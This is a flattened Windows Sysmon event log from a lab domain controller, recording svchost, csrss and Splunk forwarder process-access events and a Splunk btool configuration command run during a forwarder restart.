15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F800-000000008801}2568C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7CD8-5FA1-F700-000000008801}44764492C:\Windows\system32\cmd.exe{D28789B6-7CD8-5FA1-F800-000000008801}2568C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.562{D28789B6-7CD8-5FA1-F800-000000008801}2568C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CD8-5FA1-F700-000000008801}4476C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F700-000000008801}4476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F700-000000008801}4476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CD8-5FA1-F700-000000008801}4476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.558{D28789B6-7CD8-5FA1-F700-000000008801}4476C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F600-000000008801}3284C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 